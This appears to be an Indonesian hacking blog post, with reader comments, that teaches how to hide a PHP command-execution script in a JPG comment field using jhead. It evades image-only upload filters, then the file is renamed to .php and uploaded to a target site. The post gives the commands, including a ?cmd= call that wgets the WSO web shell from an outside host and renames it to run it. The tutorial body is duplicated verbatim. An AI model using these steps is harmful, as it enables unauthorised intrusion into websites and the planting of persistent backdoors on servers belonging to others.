Inject Script PHP ke Gambar Dengan Jhead
Cerita sedikit boleh ya, pernah ga sih kalian pada suatu saat mau upload shell atau backdoor tapi yang diperbolehkan extensinya hanya jpg only? Pasti pernah dong ngalamin hal kek begini.
Biasanya kebanyakan orang untuk mengatasi hal seperti ini menggunakan teknik tamper data atau bisa juga pake live http header, tapi terkadang itu ga semua bisa juga ditamper data.
Nah oke, berhubung gw agak selo kali ini gw mau sharing tutorial inject script php ke gambar dengan menggunakan jhead. Tapi gw ga akan menjamin walaupun udah pake teknik seperti ini shell 100% akan terupload loh ya hehe.
Oke selanjutnya,
Buat yang make Linux atau juga bisa make Termux. Yang pertama install dulu jhead seperti ini,
$ pkg install jhead
Setelah terinstall, siapkan gambar yang mau di inject dengan extensesinya jpg kalo ga punya bisa download di mbah gugel dan disini gue make gambar umaru.jpg hahaha
Selanjutnya buka terminal linux atau termux kalian, dan cari dimana tempat kalian menyimpan gambar. Dan setelah itu kalian ketikan perintah dibawah ini untuk membersihkan comment pada gambar tersebut.
$ jhead -purejpg namafile.jpg
Setelah bersih gambarnya dari comment, kalian ketikan perintah seperti berikut ini,
$ jhead -ce namafile.jpg
Maka nanti akan muncul vim text editor seperti gambar dibawah berikut ini,
Habis itu kalian masukan script inject php di vim text editor, untuk mendownload scriptnya kalian bisa klik disini, setelah itu kalian save dan untuk cara menyimpanya kalian tekan esc dulu dikeyboard baru kalian terus tuliskan :x
Kalo ada tulisan modified namafile.jpg berarti sukses, selanjutnya kita cek script inject php apa sudah masuk dengan mengetikan perintah seperti ini,
$ jhead namafile.jpg
Dan nanti akan muncul gambar seperti ini,
Jika muncul code pada gambar seperti diatas, berarti inject script phpnya sudah masuk kedalam gambar tersebut dan tinggal direname ke extensi php lalu upload ditarget kalian.
Nah oke, setelah selesai injectnya sekarang simak untuk cara menggunakanya ketikan perintah seperti berikut ini,
/namafile.php?cmd=
Untuk upload shell atau backdoor kalian bisa mengunakan fungsi wget, curl, atau yang lain karena terkadang ada website yang tidak suport wget atau curl.
Contoh perintah untuk melakukan upload shell atau backdoor seperti berikut ini,
localhost/umaru.php?cmd=wget http://linkshell.com/php/wso.txt
Setelah terupload, terus kita rename wso.txt menjadi wso.php dengan perintah seperti ini,
localhost/umaru.php?cmd=mv wso.txt wso.php
Dan untuk akses shellnya seperti ini,
localhost/wso.php
Oke sekian dari gue, semoga bermanfaat bagi kalian.
Biasanya kebanyakan orang untuk mengatasi hal seperti ini menggunakan teknik tamper data atau bisa juga pake live http header, tapi terkadang itu ga semua bisa juga ditamper data.
Nah oke, berhubung gw agak selo kali ini gw mau sharing tutorial inject script php ke gambar dengan menggunakan jhead. Tapi gw ga akan menjamin walaupun udah pake teknik seperti ini shell 100% akan terupload loh ya hehe.
Oke selanjutnya,
Buat yang make Linux atau juga bisa make Termux. Yang pertama install dulu jhead seperti ini,
$ pkg install jhead
Setelah terinstall, siapkan gambar yang mau di inject dengan extensesinya jpg kalo ga punya bisa download di mbah gugel dan disini gue make gambar umaru.jpg hahaha
Selanjutnya buka terminal linux atau termux kalian, dan cari dimana tempat kalian menyimpan gambar. Dan setelah itu kalian ketikan perintah dibawah ini untuk membersihkan comment pada gambar tersebut.
$ jhead -purejpg namafile.jpg
Setelah bersih gambarnya dari comment, kalian ketikan perintah seperti berikut ini,
$ jhead -ce namafile.jpg
Maka nanti akan muncul vim text editor seperti gambar dibawah berikut ini,
Habis itu kalian masukan script inject php di vim text editor, untuk mendownload scriptnya kalian bisa klik disini, setelah itu kalian save dan untuk cara menyimpanya kalian tekan esc dulu dikeyboard baru kalian terus tuliskan :x
Kalo ada tulisan modified namafile.jpg berarti sukses, selanjutnya kita cek script inject php apa sudah masuk dengan mengetikan perintah seperti ini,
$ jhead namafile.jpg
Dan nanti akan muncul gambar seperti ini,
Jika muncul code pada gambar seperti diatas, berarti inject script phpnya sudah masuk kedalam gambar tersebut dan tinggal direname ke extensi php lalu upload ditarget kalian.
Nah oke, setelah selesai injectnya sekarang simak untuk cara menggunakanya ketikan perintah seperti berikut ini,
/namafile.php?cmd=
Untuk upload shell atau backdoor kalian bisa mengunakan fungsi wget, curl, atau yang lain karena terkadang ada website yang tidak suport wget atau curl.
Contoh perintah untuk melakukan upload shell atau backdoor seperti berikut ini,
localhost/umaru.php?cmd=wget http://linkshell.com/php/wso.txt
Setelah terupload, terus kita rename wso.txt menjadi wso.php dengan perintah seperti ini,
localhost/umaru.php?cmd=mv wso.txt wso.php
Dan untuk akses shellnya seperti ini,
localhost/wso.php
Oke sekian dari gue, semoga bermanfaat bagi kalian.
Akhirnya ketemu juga nih artikel yg gua cari, thanks ya bro :)
ReplyDeleteOk makasih udah mampir hihi
DeleteJejak dulu gan :-d
ReplyDeleteWoke sip silahkan :)
Deleteakkwoaakoa Maqlo heker keren bang :v paklo heker oaowaokaka
ReplyDeleteHi thanks, welcome bro!
ReplyDeleteI can't save the script with esc + x how ?
ReplyDeletePress esc first with your new board and keep writing :x
ReplyDeletegan "link gambar" di script itu pake link gambar yg mana ? kan gambar udah ada di internal ? terus pake link gambar yg apa ?
ReplyDeleteLink gambar yang kamu mau inject gan, dicontoh itu saya pake umaru.jpg terus saya pake link yg umaru.jpg hasil dari search google link gambarnya itu.
Deletejhead -purejpg namafile.jpg nggak ketemu gambarnya?
ReplyDeleteKamu ngetik command kek gitu harusnya sudah tau posisi letak gambarnya yang mau di inject gan. Coba cari gambarnya dimana posisi kamu menempatkanya.
ReplyDelete